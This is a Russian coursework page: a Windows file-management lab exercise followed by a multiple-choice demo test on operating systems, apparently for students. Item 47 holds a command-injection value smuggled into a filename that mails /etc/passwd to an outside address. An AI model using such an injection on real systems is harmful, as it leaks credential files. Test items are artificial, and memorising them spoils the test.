Лекция: Тематическая структура АПИМ

1. Определите величину свободного пространства на диске C:

2. Создайте на жестком диске компьютера С: в каталоге Мои документы новую папку, которую назовите своей фамилией (например, Ivanov).

3.Откройте стандартный графический редактор Windows Paint (Пуск – Программы – Стандартные – Paint).

4. Нарисуйте в этой программе любой рисунок, например Звездное небо и сохраните его в созданной папке под именем Image. Стандартное расширение файла, содержащего рисунок Paint – BMP, так что в результате файл будет называться Image.bmp.

5.Откройте текстовый редактор WordPad (Пуск – Программы – Cтандартные — WordPad), напишите любой текст (например, свою фамилию, имя, отчество), сохраните получившийся файл, как текстовый документ в той же папке под названием text.rtf.

6.Переименуйте рисунок в image.bmp.

7.Создайте в своей папке новую папку, например, Ivanov1.

8.Скопируйте в эту папку оба созданных файла (image.bmp и text.rtf).

9.Откройте оба файла, выделите в рисунке фрагмент, скопируйте и через буфер вставьте его в текстовый документ. Сохраните итоговый текст с рисунками под именем text1.rtf в первой папке.

10.Закройте все открытые вами файлы.

11.Создайте для файла text1.rtf ярлык на рабочем столе, проверьте работу ярлыка.

12.Создайте общий ZIP-архив для всех файлов.

13. Осуществите поиск файлов на диске S:, имя которых начинаются на букву в, остальные буквы и их количество не известно.

14. Осуществите поиск файлов, последние изменения которых были произведены с 1.09.2012по1.12.2012.

15. Осуществите поиск всех графических файлов с расширениемbmp

16. Откройте папкуS:\1 курс,отсортируйте ярлыки по размеру.

17. В папке S:\1 курс осуществите вывод папок и файлов в виде списка.

18. Присвойте файлу text1.rtf статус «скрытый».

19. Снимите режим отображения «скрытых» файлов (если он установлен).

20. Установите режим показа «скрытых» файлов.

20. Снимите с файла text1.rtf статус «скрытый» и назначьте статус «только для чтения». Проверьте, можно ли в таком статусе редактировать файл.

21. Откройте проводник (Пуск – Программы – Стандартные – Проводник)

22. Разверните ветки дерева папок в левой части Проводника (нажатием на «+»). Сверните ветки дерева (нажатием на « — »)

23. В Проводнике скопируйте папку Файловая система, находящуюся в папке 1 курс диска S: в созданную вами на уроке папку (например, С:\Мои документы\Ivanov)

24. Закройте все окна.

 

Тематическая структура АПИМ

 

N ДЕ Наименование дидактической единицы ГОС N за- да- ния Тема задания
Основные понятия и определения Назначение и функции операционных систем
Операционная среда
Прерывания
Процессы и потоки
Файлы и файловые системы
Память
Пользователи
Режимы работы
Управление процессами Концепция процесса
Идентификатор, дескриптор и контекст процесса
Иерархия процессов
Диспетчеризация процессов
Понятия приоритета и очереди процессов
Синхронизация процессов
Средства обработки сигналов
Понятие событийного программирования
Средства коммуникации процессов
Способы реализации мультипрограммирования
Управление памятью Организация памяти. Адресное пространство
Методы управления памятью
Принципы организации виртуальной памяти
Сегментная организация памяти
Страничная организация памяти
Ускорение работы страничной памяти
Принципы замещения страниц
Алгоритмы замещения страниц
Управление вводом-выводом Прерывания от внешних устройств
Классификация устройств ввода-вывода
Основные принципы организации ввода-вывода
Функции супервизора ввода-вывода
Режимы управления вводом-выводом
Закрепление устройств, общие устройства ввода-вывода
Основные системные таблицы ввода-вывода
Синхронный и асинхронный ввод-вывод
Организация внешней памяти на магнитных дисках
Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках
Принципы построения и классификация Принципы построения
Ядро и ресурсы
Интерфейсы операционных систем
Классификация операционных систем
Защита от сбоев и несанкционированного доступа Анализ угроз и уязвимостей в операционных системах
Основы криптографии
Механизмы защиты
Надежные вычислительные системы
Методы аутентификации
Инсайдерские атаки
Внешние атаки
Вредоносные программы
Троянские кони и вирусы
Средства защиты от вредоносных программ

Демонстрационный вариант

ЗАДАНИЕ N 1 Назначение и функции операционных систем ( — выберите один вариант ответа) Для сетевых операционных систем характерной является функция обеспечения …
1) прямого доступа к оперативной памяти другого компьютера   2) взаимодействия связанных между собой компьютеров
3) обмена сигналами между выполняющимися на разных компьютерах программами   4) программных каналов между разными компьютерами

 

 
ЗАДАНИЕ N 2 Операционная среда ( — выберите один вариант ответа) Одна операционная система может поддерживать несколько …
1) микропрограммных сред   2) операционных систем
3) микропрограммных систем   4) операционных сред

 

Операционная система выполняет функции управления вычислительными процессами в вычислительной системе, распределяет ресурсы вычислительной системы между различными вычислительными процессами и образует программную среду, в которой выполняются прикладные программы пользователя. Такая среда называется операционной. Параллельное существование терминов “операционная система” и “операционная среда” вызвано тем, что операционная система может поддержать несколько операционных сред.  

 

ЗАДАНИЕ N 3 Прерывания ( — выберите один вариант ответа) Термин «маскирование» означает запрет отдельных …
1) сигналов прерывания   2) команд пользователя
3) процессов пользователя   4) команд процессора

 

 
ЗАДАНИЕ N 4 Процессы и потоки ( — выберите один вариант ответа) Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …
1) супервизорами   2) мониторами
3) маркерами   4) семафорами

Монитор (по Ч. Хоару) – высокоуровневая конструкция для синхронизации: многовходовый модуль, содержащий описание общих данных и операций над ними в виде процедур. Обеспечивается взаимное исключение исполнения мониторных операций. Монитор может также содержать условные переменные, для которых определены операции wait и signal для организации дополнительных очередей процессов. Рассмотрено решение задачи «обедающие философы» с использованием монитора. Описана реализация монитора и условных переменных с помощью семафоров.

 

 

ЗАДАНИЕ N 5Файлы и файловые системы ( — выберите один вариант ответа) Относительный путь к файлу состоит из списка каталогов, которые нужно …
1) пройти от рабочего каталога, чтобы добраться до файла   2) открыть в корневом процессе, чтобы добраться до файла
3) добавить в переменную PATH операционной среды   4) пройти от корневого каталога, чтобы добраться до файла

 

 
ЗАДАНИЕ N 6 Память ( — выберите один вариант ответа) Свопингом сегментов называется перемещение …
1) блоков файла между каталогами файловой системы   2) блоков данных между процессом и ядром операционной системы
3) сегментов данных между стеком и оперативной памятью   4) сегментов между оперативной и внешней памятью

 

 

 

ЗАДАНИЕ N 7 Пользователи ( — выберите один вариант ответа) Идентификатор пользователя представляет собой уникальное _______ значение
1) составное   2) символьное
3) вещественное   4) целое

 

 
ЗАДАНИЕ N 8 Режимы работы ( — выберите один вариант ответа) Мультитерминальный режим работы предполагает совмещение …
1) привилегированного режима работы и режима пользователя   2) многопроцессорного режима работы и режима ввода-вывода
3) диалогового режима работы и режима мультипрограммирования   4) аналогового режима работы и режима микропрограммирования

 

 

 

ЗАДАНИЕ N 9 Концепция процесса ( — выберите один вариант ответа) Последовательная трансляция двух исходных программ является …
1) одним последовательным процессом   2) двумя одинаковыми процессами
3) двумя разными процессами   4) одной последовательной задачей

 

 
ЗАДАНИЕ N 10 Идентификатор, дескриптор и контекст процесса ( — выберите несколько вариантов ответа) Идентификатор процесса является частью _____________ процесса.
1) контекста   2) типа
3) дескриптора   4) описателя

 

 

 

ЗАДАНИЕ N 11 Иерархия процессов ( — выберите один вариант ответа) В OS UNIX каждый новый процесс может быть образован (порожден) только …
1) двумя из существующих процессов   2) несколькими родительскими процессами
3) четным количеством родительских процессов   4) одним из существующих процессов

 

 
ЗАДАНИЕ N 12 Диспетчеризация процессов ( — выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в …
1) длительности выполнения   2) очередности выполнения
3) скорости выполнения   4) частоте выполнения

 

Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых процессов в системе, определяя ее степень мультипрограммирования, т. е. количество процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т. е. среднее количество процессов в компьютере не меняется, то новые процессы могут появляться только после завершения ранее загруженных. Поэтому долгосрочное планирование осуществляется достаточно редко.  

 

ЗАДАНИЕ N 13 Понятия приоритета и очереди процессов ( — выберите один вариант ответа) Приоритет, меняющейся во время исполнения процесса, называется _____________ приоритетом.
1) фиксированным   2) циклическим
3) статическим   4) динамическим

 

 
ЗАДАНИЕ N 14 Синхронизация процессов ( — выберите один вариант ответа) При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в …
1) адаптации   2) синхронизации
3) оптимизации   4) буферизации

 

 

 

ЗАДАНИЕ N 15 Средства обработки сигналов ( — выберите один вариант ответа) В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между …
 
1) процессами   2) процессорами
3) сегментами   4) каналами

 

 
ЗАДАНИЕ N 16 Понятие событийного программирования ????? ( — выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают …
1) трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы   2) возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
3) необходимость использования графа перехода между состояниями   4) неудобство использования графа переходов между состояниями

 

 

 

ЗАДАНИЕ N 17 Средства коммуникации процессов ( — выберите один вариант ответа) Два параллельных процесса могут быть …
1) взаимоисключающими   2) независимыми
3) критическими   4) коммутационными

 

 
ЗАДАНИЕ N 18 Способы реализации мультипрограммирования ( — выберите один вариант ответа) Главной целью мультипрограммирования в системах пакетной обработки является …
1) обеспечение удобства работы пользователей   2) минимизация простоев всех устройств компьютера
3) минимизация времени выполнения одной задачи   4) обеспечение реактивности системы

 

 

 

ЗАДАНИЕ N 19Организация памяти. Адресное пространство ( — выберите один вариант ответа) Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет …
1) находить в памяти наиболее долго занятые участки   2) выделять участки памяти произвольных размеров
3) освобождать память, занятую неактивными процессами   4) перемещать процессы в памяти

 

 
ЗАДАНИЕ N 20 Методы управления памятью ( — выберите один вариант ответа) Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти
1) аварийному завершению   2) ускорению
3) замедлению выполнения   4) перезапуску

 

 

 

ЗАДАНИЕ N 21 Принципы организации виртуальной памяти ( — выберите несколько вариантов ответа) Виртуальная память позволяет …
1) отказаться от предоставления прикладным процессам оперативной памяти   2) загружать множество небольших программ, суммарный объем которых больше объема физической памяти
3) загружать программы, размер которых превышает объем доступной физической памяти   4) загружать программы, скомпилированные для другого процессора

 

 
ЗАДАНИЕ N 22 Сегментная организация памяти ( — выберите один вариант ответа) Сегментная организация памяти … отдельно скомпилированных процедур.
1) состоит из   2) упрощает компоновку
3) невозможна без   4) усложняет компоновку

 

Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами. К ним относятся: простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегмента);  

 

ЗАДАНИЕ N 23 Страничная организация памяти ( — выберите один вариант ответа) При страничной организации памяти таблица страниц может размещаться в …
1) только в оперативной памяти   2) в оперативной памяти и на диске
3) только в процессоре   4) в специальной быстрой памяти процессора и в оперативной памяти

 

 
ЗАДАНИЕ N 24 Ускорение работы страничной памяти ( — выберите один вариант ответа) Страничная организация предназначена для …
1) облегчения совместного использования процедур, библиотек и массивов данных   2) повышения уровня защиты программ и данных
3) получения большого адресного пространства без приобретения дополнительной физической памяти   4) логического разделения программ и данных

 

 
ЗАДАНИЕ N 25 Принципы замещения страниц ( — выберите один вариант ответа) При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна …
1) выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске   2) выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения
3) выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске   4) выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц

 

 
ЗАДАНИЕ N 26 Алгоритмы замещения страниц ( — выберите один вариант ответа) Полная реализация алгоритма LRU (Least Recently Used) …
1) теоретически невозможна   2) возможна при использовании стековой организации таблицы страниц
3) возможна при условии построения таблицы страниц в виде бинарных деревьев   4) практически невозможна

 

LRU — хороший, но труднореализуемый алгоритм. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут хранится недавно использованные страницы. Причем этот список должен обновляться при каждом обращении к памяти. Много времени нужно и на поиск страниц в таком списке.  

 

ЗАДАНИЕ N 27 Прерывания от внешних устройств ( — выберите один вариант ответа) Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода.
1) контроллер   2) диспетчер
3) супервизор   4) процессор

 

супервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы  
ЗАДАНИЕ N 28 Классификация устройств ввода-вывода ( — выберите один вариант ответа) Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода.
1) позиционируемым   2) символьным
3) адресуемым   4) блочным

 

Другой тип устройств ввода-вывода — символьные устройства. Они выдают или воспринимают поток символов, не относящийся ни к какой блочной структуре. Они не являются адресуемыми и не имеют никакой операции позиционирования. В качестве символьных устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя)  

 

ЗАДАНИЕ N 29 Основные принципы организации ввода-вывода ( — выберите один вариант ответа) Любые операции по управлению вводом-выводом объявляются …
1) привилегированными   2) универсальными
3) приоритетными   4) уникальными

 

 
ЗАДАНИЕ N 30 Функции супервизора ввода-вывода ( — выберите один вариант ответа) Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор …
1) супервизору прерываний   2) диспетчеру задач
3) задаче пользователя   4) супервизору программ

 

 

 

ЗАДАНИЕ N 31 Режимы управления вводом-выводом ( — выберите один вариант ответа) В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора.
1) рационально время   2) нерационально память
3) нерационально время   4) рационально память

 

 
ЗАДАНИЕ N 32 Закрепление устройств, общие устройства ввода-вывода ( — выберите один вариант ответа) Понятия «виртуального устройства» по отношению к понятию «спулинга» …
1) соотносится как часть и целое   2) является более широким
3) является более узким   4) тождественно

 

 

 

ЗАДАНИЕ N 33 Основные системные таблицы ввода-вывода ( — выберите один вариант ответа) Каждый элемент таблицы оборудования условно называется …
1) UCB   2) USB
3) DCB   4) DRT

 

Каждая ОС имеет свои таблицы ввода/вывода, их состав (количество и назначе­ние каждой таблицы) может сильно отличаться. Первая таблица содержит информацию обо всех устройствах вво­да/вывода, подключенных к вычислительной системе,- таб­лица оборудования (equipment table), а каждый элемент этой таблицы на­зывается UCB (unit control block, блок управления устройством ввода/вывода). Вторая таблица предназначена для реализации принципа виртуа­лизации устройств ввода/вывода – независимости от устройства. Действительное устройство, которое сопоставляется виртуальному (логическому), выбирается супервизором с помощью таблицы описания виртуальных логических устройств (DRT, device reference table). Назначение этой второй таблицы – установление связи между виртуальными (логическими) устройствами и реальными устройст­вами, описанными посредством первой таблицы оборудования.  
ЗАДАНИЕ N 34 Синхронный и асинхронный ввод-вывод ( — выберите один вариант ответа) Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод.
1) асинхронный   2) приоритетный
3) автоматический   4) синхронный

 

 

 

ЗАДАНИЕ N 35 Организация внешней памяти на магнитных дисках ( — выберите один вариант ответа) Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком.
1) системным   2) внесистемным
3) начальным   4) локальным

 

На жестком диске по физическому адресу 0-0-1 располагается главная загрузочная запись (master boot record, MBR). В состав MBR входят:   — внесистемный загрузчик (non-system bootstrap — NSB); — таблица описания разделов диска (таблица разделов, partition table, PT).  
ЗАДАНИЕ N 36 Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках ( — выберите один вариант ответа) Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной …
1) кластеризации   2) буферизации
3) диспетчеризации   4) приоритезации

 

 

 

ЗАДАНИЕ N 37 Принципы построенияОС ( — выберите один вариант ответа) Операционная система реального времени должна обеспечивать …
1) делегирование полномочий   2) наследование приоритетов
3) пакетную обработку   4) клонирование пользователей

 

Требования, предъявляемые к среде исполнения систем реального времени, следующие: — ядро с приоритетом на обслуживание прерывания. Приоритет на прерывание означает, что готовый к запуску процесс, обладающий некоторым приоритетом, обязательно имеет преимущество в очереди по отношению к процессу с более низким приоритетом, быстро заменяет последний и поступает на выполнение. Ядро заканчивает любую сервисную работу, как только поступает задача с высшим приоритетом. — диспетчер с приоритетом — дает возможность разработчику прикладной программы присвоить каждому загрузочному модулю приоритет, неподвластный системе. Присвоение приоритетов используется для определения очередности запуска программ, готовых к исполнению. Диспетчеризация, в основу которой положен принцип присвоения приоритета, и наличие ядра с приоритетом на прерывание позволяют. Если наступает событие с высшим приоритетом, система прекращает обработку задачи с низшим приоритетом и отвечает на вновь поступивший запрос. Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ
  • ОС должна быть многозадачной и допускающей вытеснение (preemptable),
  • ОС должна обладать понятием приоритета для потоков,
  • ОС должна поддерживать предсказуемые механизмы синхронизации,
  • ОС должна обеспечивать механизм наследования приоритетов,
 
ЗАДАНИЕ N 38 Ядро и ресурсы ( — выберите один вариант ответа) К невыгружаемым относятся такие ресурсы, которые не могут быть …
1) загружены в память   2) выгружены из памяти
3) отобраны у процесса   4) отобраны у процессора

 

Выгружаемый ресурс — этот ресурс безболезненно можно забрать у процесса (например: память). Невыгружаемый ресурс — этот ресурс нельзя забрать у процесса без потери данных (например: принтер).  

 

ЗАДАНИЕ N 39 Интерфейсы операционных систем ( — выберите один вариант ответа) Интерфейс прикладного программирования предназначен для использования прикладными программами …
1) системных ресурсов компьютера   2) регистров общего назначения процессора
3) интерпретатора команд пользователя   4) адресного пространства процесса

 

Практически все операционные системы имеют API, с помощью которого программисты могут создавать приложения для этой операционной системы. Главный API операционных систем — это множество системных вызовов.  
ЗАДАНИЕ N 40 Классификация операционных систем( — выберите несколько вариантов ответа) По режиму обработки задач различают операционные системы, обеспечивающие _________ режим
1) мультипрограммный   2) виртуальный
3) однопрограммный   4) многопользовательский

 

 

 

ЗАДАНИЕ N 41 Анализ угроз и уязвимостей в операционных системах ( — выберите один вариант ответа) Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.
1) вызова утилит операционной системы   2) диспетчера приложений
3) вредоносных программ   4) подбора пароля

 

ботнет или зомби-сеть – это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя.  
ЗАДАНИЕ N 42 Основы криптографии ( — выберите один вариант ответа) Недостаток систем шифрования с секретным ключом состоит в том, что …
1) отправитель сообщения не может его расшифровать   2) отправитель и получатель должны иметь общий секретный ключ
3) объем вычислений при дешифровании намного больше, чем при шифровании   4) объем вычислений при шифровании намного больше, чем при дешифровании

 

Эффективность систем с секретным ключом обусловлена вполне приемлемым объемом вычислений, необходимых для шифрования или дешифрования сообщения, но у них имеется серьезный недостаток: и отправитель, и получатель должны владеть общим секретным ключом  

 

ЗАДАНИЕ N 43 Механизмы защиты ( — выберите один вариант ответа) Объектами защиты в компьютерных системах могут быть …
ВАРИАНТЫ ОТВЕТОВ:
1) устройства отображения информации   2) помещения
3) сотрудники   4) программы

 

Объект защиты — информация, носитель информации или информационный процесс, в отношении которых необходимо обеспечивать защиту в соответствии с поставленной целью защиты информации.  
ЗАДАНИЕ N 44 Надежные вычислительные системы ( — выберите один вариант ответа) Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на…
ВАРИАНТЫ ОТВЕТОВ:
1) пользователей   2) прикладную программу
3) операционную систему   4) руководителей подразделений

 

 

 

ЗАДАНИЕ N 45 Методы аутентификации ( — выберите один вариант ответа) Защита зашифрованных паролей в UNIX взламывается путем …
1) шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей   2) привлечения инсайдеров в качестве сообщников
3) расшифровки всех паролей после копирования файла паролей   4) вычисления пароля путем свертки идентификатора пользователя

 

 
ЗАДАНИЕ N 46 Инсайдерские атаки ( — выберите один вариант ответа) Лазейки в программах создаются …
1) для облегчения отладки программ или в противоправных целях   2) только для противоправных целей
3) для внедрения в программу постороннего кода   4) только для облегчения отладки программ

 

Лазейки (trapdoors). Лазейка представляет собой точку вхо­да в программу, благодаря чему открывается непосредственный доступ к некоторым системным функциям. Лазейки обычно встав­ляют во время проектирования системы. Системные программисты организуют их при отладке программы, но по завершении ее разработки их надо устранить.  

 

ЗАДАНИЕ N 47 Внешние атаки ( — выберите один вариант ответа) Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?
1) Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.   2) Отправит файл aaa адресату goofinator@mail.ru.
3) Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.   4) Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

 

 
ЗАДАНИЕ N 48 Вредоносные программы ( — выберите один вариант ответа) Наиболее популярное применение ботнетов (сети зараженных компьютеров) — это …
1) организация сетевых азартных игр   2) распространение пиратского контента
3) рассылка коммерческого спама   4) хищение денег с кредитных карт

 

 

 

ЗАДАНИЕ N 49 Троянские кони и вирусы ( — выберите один вариант ответа) Перезаписывающий вирус заражает исполняемую программу путем …
1) записи кода вируса в тело зараженной программы после каждого ее вызова   2) перезаписи содержимого стека программы кодом вируса
3) перезаписи служебных секторов дисков   4) записи вируса на место кода программы

 

 
ЗАДАНИЕ N 50 Средства защиты от вредоносных программ ( — выберите один вариант ответа) Обнаружить зашифрованный вирус можно…
1) с помощью универсальной программы дешифрования   2) по характерному поведению зараженной программы при запуске
3) по сигнатурам кода процедур расшифровки вируса   4) по изменению размера программы

 

Это вирусы-партизаны, которые попав в систему, сразу не дают себя обнаружить и не вступают в активную фазу. Они выжидают нужное им время, находясь в закодированном и безвредном состоянии, при этом зачастую они остаются незамеченными сканерами антивирусов. Как только наступает благоприятное для заражения файлов время, вирусы дешифруются, выполняют свою «грязную работу» и снова кодируются. Различные методы шифрования и упаковки вредоносных программ делают даже известные вирусы не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих «замаскированных» вирусов требуется мощный механизм распаковки, который может дешифровать файлы перед их проверкой  

 

 

еще рефераты
Еще работы по информатике